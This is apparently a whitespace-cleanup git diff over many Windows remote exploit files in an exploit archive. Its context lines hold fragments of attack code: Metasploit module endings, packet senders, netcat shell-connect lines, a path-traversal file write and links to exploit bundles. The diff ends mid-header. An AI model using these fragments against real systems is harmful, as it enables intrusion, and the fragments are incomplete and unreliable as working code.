Disclosure -http://localhost:8080/file.php%20 (html) - +http://localhost:8080/file.php%20 (html) \ No newline at end of file diff --git a/platforms/windows/remote/17581.txt b/platforms/windows/remote/17581.txt index 5c27b51d4..0b55359fa 100755 --- a/platforms/windows/remote/17581.txt +++ b/platforms/windows/remote/17581.txt @@ -12,7 +12,4 @@ http://127.0.0.1/index.php. /html. #File Download http://IP:PORT/index.php. /html. http://127.0.0.1/index.php%20 #File Download -http://IP:PORT/index.php%20 - - - +http://IP:PORT/index.php%20 \ No newline at end of file diff --git a/platforms/windows/remote/17588.rb b/platforms/windows/remote/17588.rb index 4c9f102ba..c2501d6a5 100755 --- a/platforms/windows/remote/17588.rb +++ b/platforms/windows/remote/17588.rb @@ -180,4 +180,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17612.rb b/platforms/windows/remote/17612.rb index 2ab54b804..343ebb8c3 100755 --- a/platforms/windows/remote/17612.rb +++ b/platforms/windows/remote/17612.rb @@ -133,6 +133,4 @@ e.data = "" | end -end - - +end \ No newline at end of file diff --git a/platforms/windows/remote/17619.py b/platforms/windows/remote/17619.py index af60ec58e..97cd5647a 100755 --- a/platforms/windows/remote/17619.py +++ b/platforms/windows/remote/17619.py @@ -40,4 +40,4 @@ if __name__ == "__main__": # netascii rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) - print rec_data.strip() + print rec_data.strip() \ No newline at end of file diff --git a/platforms/windows/remote/17656.rb b/platforms/windows/remote/17656.rb index c586f9c27..9479c09f8 100755 --- a/platforms/windows/remote/17656.rb +++ b/platforms/windows/remote/17656.rb @@ -265,4 +265,4 @@ class Metasploit3 < Msf::Exploit::Remote # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17659.rb b/platforms/windows/remote/17659.rb index fc419a268..42f3212dd 100755 --- a/platforms/windows/remote/17659.rb +++ b/platforms/windows/remote/17659.rb @@ -224,4 +224,4 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17669.py b/platforms/windows/remote/17669.py index 024319e7c..18c1f8843 100755 --- a/platforms/windows/remote/17669.py +++ b/platforms/windows/remote/17669.py @@ -97,4 +97,4 @@ s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, 80)) s.send(buf) s.send("\r\n") -print s.recv(1024) +print s.recv(1024) \ No newline at end of file diff --git a/platforms/windows/remote/17672.html b/platforms/windows/remote/17672.html index 1eba5e7d1..89d745c66 100755 --- a/platforms/windows/remote/17672.html +++ b/platforms/windows/remote/17672.html @@ -149,4 +149,4 @@ function trigger(){ trigger(); - + \ No newline at end of file diff --git a/platforms/windows/remote/17692.rb b/platforms/windows/remote/17692.rb index 5f1dd3052..49f024ed5 100755 --- a/platforms/windows/remote/17692.rb +++ b/platforms/windows/remote/17692.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17697.rb b/platforms/windows/remote/17697.rb index 36ba80cb9..048a5ef87 100755 --- a/platforms/windows/remote/17697.rb +++ b/platforms/windows/remote/17697.rb @@ -140,4 +140,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17699.rb b/platforms/windows/remote/17699.rb index a633aa059..c023b4575 100755 --- a/platforms/windows/remote/17699.rb +++ b/platforms/windows/remote/17699.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17700.rb b/platforms/windows/remote/17700.rb index 6cfd31bc4..fb8f9ea65 100755 --- a/platforms/windows/remote/17700.rb +++ b/platforms/windows/remote/17700.rb @@ -173,4 +173,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17719.rb b/platforms/windows/remote/17719.rb index 0dbb54c3b..99804df17 100755 --- a/platforms/windows/remote/17719.rb +++ b/platforms/windows/remote/17719.rb @@ -163,4 +163,4 @@ class Metasploit3 < Msf::Auxiliary return false end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17721.rb b/platforms/windows/remote/17721.rb index b7a73cdab..cbb2443bf 100755 --- a/platforms/windows/remote/17721.rb +++ b/platforms/windows/remote/17721.rb @@ -60,4 +60,4 @@ payload << "\x90" * (4058 - shellcode.length) pack = "GET /#{payload} HTTP/1.1\r\n" pack << "Host: http://#{@ip}:#{@port}\r\n\r\n" -puts "packet sended." if send(pack) +puts "packet sended." if send(pack) \ No newline at end of file diff --git a/platforms/windows/remote/1776.c b/platforms/windows/remote/1776.c index 0eeed97b3..343795056 100755 --- a/platforms/windows/remote/1776.c +++ b/platforms/windows/remote/1776.c @@ -185,4 +185,4 @@ int main(int argc, char **argv) return 0; } -// milw0rm.com [2006-05-10] +// milw0rm.com [2006-05-10] \ No newline at end of file diff --git a/platforms/windows/remote/17762.rb b/platforms/windows/remote/17762.rb index 1d6f223f8..40374ea40 100755 --- a/platforms/windows/remote/17762.rb +++ b/platforms/windows/remote/17762.rb @@ -198,4 +198,4 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}") send_response(cli, html, { 'Content-Type' => 'text/html' }) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17810.rb b/platforms/windows/remote/17810.rb index 2eb1964ec..f5b57adb9 100755 --- a/platforms/windows/remote/17810.rb +++ b/platforms/windows/remote/17810.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17819.py b/platforms/windows/remote/17819.py index 8096254d0..e09ca5e8c 100755 --- a/platforms/windows/remote/17819.py +++ b/platforms/windows/remote/17819.py @@ -62,6 +62,4 @@ try: raw_input("[+] Press any key to exit\n") except: print "[+] Could not connect to %s!" % target - sys.exit(0) - - + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/remote/17827.rb b/platforms/windows/remote/17827.rb index f86f59f10..99effee2e 100755 --- a/platforms/windows/remote/17827.rb +++ b/platforms/windows/remote/17827.rb @@ -118,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17848.rb b/platforms/windows/remote/17848.rb index 1cb5c22bc..f009bc563 100755 --- a/platforms/windows/remote/17848.rb +++ b/platforms/windows/remote/17848.rb @@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17849.rb b/platforms/windows/remote/17849.rb index f0f4b7d37..eaad87ae7 100755 --- a/platforms/windows/remote/17849.rb +++ b/platforms/windows/remote/17849.rb @@ -248,4 +248,4 @@ class Metasploit3 < Msf::Exploit::Remote return spray end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17855.rb b/platforms/windows/remote/17855.rb index 1d1012fe7..5af3d2e18 100755 --- a/platforms/windows/remote/17855.rb +++ b/platforms/windows/remote/17855.rb @@ -145,4 +145,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/1787.py b/platforms/windows/remote/1787.py index e496eab39..7dc358e1f 100755 --- a/platforms/windows/remote/1787.py +++ b/platforms/windows/remote/1787.py @@ -120,4 +120,4 @@ if __name__ == '__main__': exploit() -# milw0rm.com [2006-05-15] +# milw0rm.com [2006-05-15] \ No newline at end of file diff --git a/platforms/windows/remote/17876.py b/platforms/windows/remote/17876.py index 5eb34cd74..464248178 100755 --- a/platforms/windows/remote/17876.py +++ b/platforms/windows/remote/17876.py @@ -229,5 +229,4 @@ class ftp_server: try: ftp_server().main() except socket.error: - print "[!] Socket is not ready, shutting down...\n" - + print "[!] Socket is not ready, shutting down...\n" \ No newline at end of file diff --git a/platforms/windows/remote/1788.pm b/platforms/windows/remote/1788.pm index c1b0310b7..77e2b2381 100755 --- a/platforms/windows/remote/1788.pm +++ b/platforms/windows/remote/1788.pm @@ -153,4 +153,4 @@ sub HandlePuttyClient 1; -# milw0rm.com [2006-05-15] +# milw0rm.com [2006-05-15] \ No newline at end of file diff --git a/platforms/windows/remote/17884.py b/platforms/windows/remote/17884.py index 71759c12a..ff2ab0da8 100755 --- a/platforms/windows/remote/17884.py +++ b/platforms/windows/remote/17884.py @@ -109,4 +109,4 @@ s.recv(1024) time.sleep(2) print "(+) Getting shell.." os.system("nc -vv %s 1337" % target) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/17886.py b/platforms/windows/remote/17886.py index 15df1a6d6..d2a8055ea 100755 --- a/platforms/windows/remote/17886.py +++ b/platforms/windows/remote/17886.py @@ -73,4 +73,4 @@ try: except: print "[X] Unable to connect to %s" % target -raw_input("[+] Press any key to exit\n") +raw_input("[+] Press any key to exit\n") \ No newline at end of file diff --git a/platforms/windows/remote/17904.rb b/platforms/windows/remote/17904.rb index f57241c23..2b47ea3ca 100755 --- a/platforms/windows/remote/17904.rb +++ b/platforms/windows/remote/17904.rb @@ -165,4 +165,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17948.rb b/platforms/windows/remote/17948.rb index 39e57cea4..14340e0ff 100755 --- a/platforms/windows/remote/17948.rb +++ b/platforms/windows/remote/17948.rb @@ -176,4 +176,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/17977.txt b/platforms/windows/remote/17977.txt index d96ebf98d..69e083a1d 100755 --- a/platforms/windows/remote/17977.txt +++ b/platforms/windows/remote/17977.txt @@ -25,4 +25,4 @@ PORT 8080 ONLY. CHEERS, KINGCOPE -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17977.tar.bz2 (DAYTONA_FULL.tar.bz2) \ No newline at end of file diff --git a/platforms/windows/remote/17993.rb b/platforms/windows/remote/17993.rb index 7c10737c4..63be9b2d1 100755 --- a/platforms/windows/remote/17993.rb +++ b/platforms/windows/remote/17993.rb @@ -150,4 +150,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18016.txt b/platforms/windows/remote/18016.txt index 63c87c10d..d3f634dcb 100755 --- a/platforms/windows/remote/18016.txt +++ b/platforms/windows/remote/18016.txt @@ -59,4 +59,4 @@ The resulting file will look like this: poc, which overwrites boot.ini: http://retrogod.altervista.org/9sg_autovueiii.zip -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18016.zip (9sg_autovueiii.zip) +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18016.zip (9sg_autovueiii.zip) \ No newline at end of file diff --git a/platforms/windows/remote/18051.txt b/platforms/windows/remote/18051.txt index f5d372828..c17421078 100755 --- a/platforms/windows/remote/18051.txt +++ b/platforms/windows/remote/18051.txt @@ -868,4 +868,4 @@ Ref :
target.CloseFile(solo); - + \ No newline at end of file diff --git a/platforms/windows/remote/18092.html b/platforms/windows/remote/18092.html index 921eef9f7..adc6c1711 100755 --- a/platforms/windows/remote/18092.html +++ b/platforms/windows/remote/18092.html @@ -90,4 +90,4 @@ try{ catch(e){ } obj.SetDevNames(x,x,""); - + \ No newline at end of file diff --git a/platforms/windows/remote/18102.rb b/platforms/windows/remote/18102.rb index bc5a4ca44..27c23012f 100755 --- a/platforms/windows/remote/18102.rb +++ b/platforms/windows/remote/18102.rb @@ -162,6 +162,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - - +end \ No newline at end of file diff --git a/platforms/windows/remote/18123.rb b/platforms/windows/remote/18123.rb index a161fb542..4ba646d6f 100755 --- a/platforms/windows/remote/18123.rb +++ b/platforms/windows/remote/18123.rb @@ -201,4 +201,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 0:005> dd @esp 0203f594 41414141 41414141 41414141 41414141 0203f5a4 41414141 41414141 41414141 41414141 -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18134.rb b/platforms/windows/remote/18134.rb index 609fa5e03..10b6dca47 100755 --- a/platforms/windows/remote/18134.rb +++ b/platforms/windows/remote/18134.rb @@ -221,4 +221,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 0203f350 41414141 41414141 41414141 41414141 0203f360 41414141 41414141 41414141 41414141 0203f370 41414141 41414141 41414141 41414141 -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18182.txt b/platforms/windows/remote/18182.txt index 465b15243..06d1f8e4c 100755 --- a/platforms/windows/remote/18182.txt +++ b/platforms/windows/remote/18182.txt @@ -168,4 +168,4 @@ WindowsUpdate WinRAR 226 Transfer complete. 835 bytes transferred. 50.96 KB/sec. FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s -ftp> +ftp> \ No newline at end of file diff --git a/platforms/windows/remote/18183.rb b/platforms/windows/remote/18183.rb index da1f8bf3c..83d0c63a2 100755 --- a/platforms/windows/remote/18183.rb +++ b/platforms/windows/remote/18183.rb @@ -116,4 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18187.c b/platforms/windows/remote/18187.c index f0e47d928..7802259dc 100755 --- a/platforms/windows/remote/18187.c +++ b/platforms/windows/remote/18187.c @@ -162,4 +162,4 @@ printf ("\n[+]Connecting to port 4444 to get shell!\n"); sleep (2); system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); exit (0); -} +} \ No newline at end of file diff --git a/platforms/windows/remote/18189.txt b/platforms/windows/remote/18189.txt index 4337a488d..e3bb2d94a 100755 --- a/platforms/windows/remote/18189.txt +++ b/platforms/windows/remote/18189.txt @@ -128,5 +128,4 @@ if __name__ == "__main__": ## netascii rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) - print rec_data.strip() - + print rec_data.strip() \ No newline at end of file diff --git a/platforms/windows/remote/18190.rb b/platforms/windows/remote/18190.rb index 00a254b21..1757a3ebb 100755 --- a/platforms/windows/remote/18190.rb +++ b/platforms/windows/remote/18190.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18235.pl b/platforms/windows/remote/18235.pl index e0a34eddc..b57f986d0 100755 --- a/platforms/windows/remote/18235.pl +++ b/platforms/windows/remote/18235.pl @@ -67,4 +67,4 @@ $ftp->rmdir($payload) or die "rmdir failed ", $ftp->message; print "[+] Done\n"; $ftp->quit; exit 0; -#EOF +#EOF \ No newline at end of file diff --git a/platforms/windows/remote/18240.rb b/platforms/windows/remote/18240.rb index 087a554bd..f320511a9 100755 --- a/platforms/windows/remote/18240.rb +++ b/platforms/windows/remote/18240.rb @@ -102,4 +102,4 @@ target.ret verified on: - Win XP SP3 unpatched - Win XP SP3 fully-patched - Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18283.rb b/platforms/windows/remote/18283.rb index f95a820c6..9521d88d8 100755 --- a/platforms/windows/remote/18283.rb +++ b/platforms/windows/remote/18283.rb @@ -50,4 +50,4 @@ class Metasploit3 < Msf::Exploit::Remote cli.put(sploit) close_client(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18365.rb b/platforms/windows/remote/18365.rb index b7a6c9c7b..6c922dbf7 100755 --- a/platforms/windows/remote/18365.rb +++ b/platforms/windows/remote/18365.rb @@ -190,4 +190,4 @@ function #{func_main}() # Handle the payload handler(cli) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18367.rb b/platforms/windows/remote/18367.rb index d5b2a1a5c..7af028bc6 100755 --- a/platforms/windows/remote/18367.rb +++ b/platforms/windows/remote/18367.rb @@ -87,5 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote return uri_path end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/18381.rb b/platforms/windows/remote/18381.rb index 1a2ae7d45..fc0912abe 100755 --- a/platforms/windows/remote/18381.rb +++ b/platforms/windows/remote/18381.rb @@ -155,4 +155,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18382.py b/platforms/windows/remote/18382.py index f175fb64b..991accbf0 100755 --- a/platforms/windows/remote/18382.py +++ b/platforms/windows/remote/18382.py @@ -100,8 +100,4 @@ try: s.recv(1024) s.close() except: - print "[X] Meh! Fail!" - - - - + print "[X] Meh! Fail!" \ No newline at end of file diff --git a/platforms/windows/remote/18397.py b/platforms/windows/remote/18397.py index 7e85d1c71..814aef14b 100755 --- a/platforms/windows/remote/18397.py +++ b/platforms/windows/remote/18397.py @@ -130,4 +130,4 @@ udp = socket(AF_INET,SOCK_DGRAM) udp.sendto(data, (hostname, port)) print "Send malicius packet\n" -print "You Should Got a shell at %s 4444" % hostname +print "You Should Got a shell at %s 4444" % hostname \ No newline at end of file diff --git a/platforms/windows/remote/18401.py b/platforms/windows/remote/18401.py index 6297fe919..c38279efc 100755 --- a/platforms/windows/remote/18401.py +++ b/platforms/windows/remote/18401.py @@ -47,4 +47,4 @@ sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(sendbuf) -sock.close() +sock.close() \ No newline at end of file diff --git a/platforms/windows/remote/18420.rb b/platforms/windows/remote/18420.rb index a7546cf24..2a67ddacf 100755 --- a/platforms/windows/remote/18420.rb +++ b/platforms/windows/remote/18420.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18423.rb b/platforms/windows/remote/18423.rb index ee2004862..4e8fcf750 100755 --- a/platforms/windows/remote/18423.rb +++ b/platforms/windows/remote/18423.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18426.rb b/platforms/windows/remote/18426.rb index 1e234f6d8..1202f8605 100755 --- a/platforms/windows/remote/18426.rb +++ b/platforms/windows/remote/18426.rb @@ -468,4 +468,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18437.txt b/platforms/windows/remote/18437.txt index df789ab5c..7f97d1eb7 100755 --- a/platforms/windows/remote/18437.txt +++ b/platforms/windows/remote/18437.txt @@ -171,4 +171,4 @@ def main(): sys.exit(-1) if __name__ == '__main__': - main() + main() \ No newline at end of file diff --git a/platforms/windows/remote/18449.rb b/platforms/windows/remote/18449.rb index 937fc2058..1ee875012 100755 --- a/platforms/windows/remote/18449.rb +++ b/platforms/windows/remote/18449.rb @@ -119,4 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18479.rb b/platforms/windows/remote/18479.rb index 79ce65e66..ae274e608 100755 --- a/platforms/windows/remote/18479.rb +++ b/platforms/windows/remote/18479.rb @@ -323,4 +323,4 @@ http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18485.rb b/platforms/windows/remote/18485.rb index b0defee69..3f365312c 100755 --- a/platforms/windows/remote/18485.rb +++ b/platforms/windows/remote/18485.rb @@ -195,4 +195,4 @@ class Metasploit3 < Msf::Exploit::Remote super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18514.rb b/platforms/windows/remote/18514.rb index 71e1d6027..59fdcc45e 100755 --- a/platforms/windows/remote/18514.rb +++ b/platforms/windows/remote/18514.rb @@ -130,4 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18520.rb b/platforms/windows/remote/18520.rb index be6d4f918..c24932810 100755 --- a/platforms/windows/remote/18520.rb +++ b/platforms/windows/remote/18520.rb @@ -328,4 +328,4 @@ EOS super end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18521.rb b/platforms/windows/remote/18521.rb index 52a94d8e3..627d1312c 100755 --- a/platforms/windows/remote/18521.rb +++ b/platforms/windows/remote/18521.rb @@ -108,4 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18534.py b/platforms/windows/remote/18534.py index 3d7ea2e5b..0998c61d0 100755 --- a/platforms/windows/remote/18534.py +++ b/platforms/windows/remote/18534.py @@ -75,4 +75,4 @@ print " Launching exploit against " + host + " on port " + str(port) + " print "============================================================================" sftp.get(remotepath, localpath) sftp.close() -transport.close() +transport.close() \ No newline at end of file diff --git a/platforms/windows/remote/18535.py b/platforms/windows/remote/18535.py index c3727b046..af0b37f47 100755 --- a/platforms/windows/remote/18535.py +++ b/platforms/windows/remote/18535.py @@ -96,5 +96,4 @@ transport = paramiko.Transport((host, port)) print "[+] Launching exploit against " + host + " on port " + str(port) print "[+] Done!" transport.connect(username = buff, password = "pwnag3") -transport.close() - +transport.close() \ No newline at end of file diff --git a/platforms/windows/remote/18538.rb b/platforms/windows/remote/18538.rb index dd46d1e2d..bb3fdc93a 100755 --- a/platforms/windows/remote/18538.rb +++ b/platforms/windows/remote/18538.rb @@ -182,4 +182,4 @@ C:\Program Files\ASUS\Net4Switch\ipswcom.dll .text:100305A9 push offset aIpsw_alertS ; "[IPSW_alert] = %s" .text:100305AE push 0FFh .text:100305B3 call ds:CxDbgPrint -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18539.rb b/platforms/windows/remote/18539.rb index f0ccee794..465b32e6f 100755 --- a/platforms/windows/remote/18539.rb +++ b/platforms/windows/remote/18539.rb @@ -256,4 +256,4 @@ Image name: PCSWDLG.DLL File version: 5090.1.7103.892 CompanyName: IBM Corporation ProductName: Personal Communications -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18542.txt b/platforms/windows/remote/18542.txt index 5dc8dedf1..924c34195 100755 --- a/platforms/windows/remote/18542.txt +++ b/platforms/windows/remote/18542.txt @@ -156,6 +156,4 @@ res = sock.recv(10000) sock.close() print "[+] Source Code of Netdecision Traffice Grapher Server : \r\n" print res -sys.exit(1) - - +sys.exit(1) \ No newline at end of file diff --git a/platforms/windows/remote/18543.py b/platforms/windows/remote/18543.py index 95091db0e..01fce1b3b 100755 --- a/platforms/windows/remote/18543.py +++ b/platforms/windows/remote/18543.py @@ -152,4 +152,4 @@ if res.find('file: ') != -1 : else: print "[+] Did not get the source path ..." -sys.exit(1) +sys.exit(1) \ No newline at end of file diff --git a/platforms/windows/remote/18555.txt b/platforms/windows/remote/18555.txt index b658eeb63..f4e1cc17c 100755 --- a/platforms/windows/remote/18555.txt +++ b/platforms/windows/remote/18555.txt @@ -242,6 +242,4 @@ other media, are reserved by Vulnerability-Lab or its suppliers. -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com -Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com - - +Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/windows/remote/18557.rb b/platforms/windows/remote/18557.rb index b94a4f913..bf2a73347 100755 --- a/platforms/windows/remote/18557.rb +++ b/platforms/windows/remote/18557.rb @@ -225,4 +225,4 @@ end =begin Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not relying on net/ssh. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18572.rb b/platforms/windows/remote/18572.rb index b472e5931..02ccf5c52 100755 --- a/platforms/windows/remote/18572.rb +++ b/platforms/windows/remote/18572.rb @@ -306,4 +306,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash10x.ocx - Flash10x+0x48b65: 10048b65 ff5008 call dword ptr [eax+8] ds:0023:0c0c0c14=???????? -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18621.txt b/platforms/windows/remote/18621.txt index dd2215b91..75eace5ae 100755 --- a/platforms/windows/remote/18621.txt +++ b/platforms/windows/remote/18621.txt @@ -140,4 +140,4 @@ try{ obj.BackImage = x; }catch(e){ } - + \ No newline at end of file diff --git a/platforms/windows/remote/18622.txt b/platforms/windows/remote/18622.txt index c89ef828d..5ba162708 100755 --- a/platforms/windows/remote/18622.txt +++ b/platforms/windows/remote/18622.txt @@ -461,5 +461,4 @@ $url = "http://$host:$port/upl/suntzu.asp"; $out = _s($url, 0, "", ""); print($out."\n"); print("[*] Now look for calc.exe sub-process..."); -?> - +?> \ No newline at end of file diff --git a/platforms/windows/remote/18623.txt b/platforms/windows/remote/18623.txt index 979e82a35..00668cc7b 100755 --- a/platforms/windows/remote/18623.txt +++ b/platforms/windows/remote/18623.txt @@ -178,4 +178,4 @@ $soap=' $url = "http://$host:$port/WSVulnerabilityCore/VulCore.asmx"; $out = _s($url, 1, "", $soap); print($out."\n"); -?> +?> \ No newline at end of file diff --git a/platforms/windows/remote/18624.txt b/platforms/windows/remote/18624.txt index 8166c8b7c..50994bb95 100755 --- a/platforms/windows/remote/18624.txt +++ b/platforms/windows/remote/18624.txt @@ -75,5 +75,4 @@ POC: - + \ No newline at end of file diff --git a/platforms/windows/remote/18625.txt b/platforms/windows/remote/18625.txt index a0c42605b..08d8c2354 100755 --- a/platforms/windows/remote/18625.txt +++ b/platforms/windows/remote/18625.txt @@ -103,4 +103,4 @@ Safe for Initialization: ? + \ No newline at end of file diff --git a/platforms/windows/remote/18634.rb b/platforms/windows/remote/18634.rb index c2c95eda2..014e33040 100755 --- a/platforms/windows/remote/18634.rb +++ b/platforms/windows/remote/18634.rb @@ -175,4 +175,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 .text:03854F9F push offset aSSS ; "%s%s%s" .text:03854FA4 push ebx ; Dest .text:03854FA5 call ds:sprintf -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18658.rb b/platforms/windows/remote/18658.rb index 973c78f14..b9dd8941c 100755 --- a/platforms/windows/remote/18658.rb +++ b/platforms/windows/remote/18658.rb @@ -119,5 +119,4 @@ start end module name Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most stable component we can use is msvcrt.dll for now. -=end - +=end \ No newline at end of file diff --git a/platforms/windows/remote/18666.rb b/platforms/windows/remote/18666.rb index d88638380..1c2d5d230 100755 --- a/platforms/windows/remote/18666.rb +++ b/platforms/windows/remote/18666.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18672.txt b/platforms/windows/remote/18672.txt index d5a44620b..7dea3d81b 100755 --- a/platforms/windows/remote/18672.txt +++ b/platforms/windows/remote/18672.txt @@ -112,4 +112,4 @@ Safe For Initialization (IObjectSafety): ? + \ No newline at end of file diff --git a/platforms/windows/remote/18695.py b/platforms/windows/remote/18695.py index df20dc673..b86442b74 100755 --- a/platforms/windows/remote/18695.py +++ b/platforms/windows/remote/18695.py @@ -133,4 +133,4 @@ if __name__ == '__main__': main() dirtrav() - keepgoing() + keepgoing() \ No newline at end of file diff --git a/platforms/windows/remote/18697.rb b/platforms/windows/remote/18697.rb index e6097a55f..fc573891e 100755 --- a/platforms/windows/remote/18697.rb +++ b/platforms/windows/remote/18697.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote file_create(buffer) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18703.txt b/platforms/windows/remote/18703.txt index 7dd9a9740..46a13c2d8 100755 --- a/platforms/windows/remote/18703.txt +++ b/platforms/windows/remote/18703.txt @@ -28,4 +28,4 @@ try{ obj.SaveToFile("../../../../../../../../../../windows/win.ini"); }catch(e){ } - + \ No newline at end of file diff --git a/platforms/windows/remote/18704.txt b/platforms/windows/remote/18704.txt index 51344876e..b982cc623 100755 --- a/platforms/windows/remote/18704.txt +++ b/platforms/windows/remote/18704.txt @@ -20,4 +20,4 @@ rgod + \ No newline at end of file diff --git a/platforms/windows/remote/18714.rb b/platforms/windows/remote/18714.rb index e8c62c98b..de19e1f5d 100755 --- a/platforms/windows/remote/18714.rb +++ b/platforms/windows/remote/18714.rb @@ -175,4 +175,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/18727.rb b/platforms/windows/remote/18727.rb index b8996f83a..61aba3ae0 100755 --- a/platforms/windows/remote/18727.rb +++ b/platforms/windows/remote/18727.rb @@ -260,4 +260,4 @@ Function isn't protected with stack cookies so get the control flow is easy by overwriting the saved EIP on the stack. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18735.rb b/platforms/windows/remote/18735.rb index 2dd37e3df..f1a77f3eb 100755 --- a/platforms/windows/remote/18735.rb +++ b/platforms/windows/remote/18735.rb @@ -257,4 +257,4 @@ eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 ANNOTA_1+0xae62: 4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=???????? -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/18759.rb b/platforms/windows/remote/18759.rb index 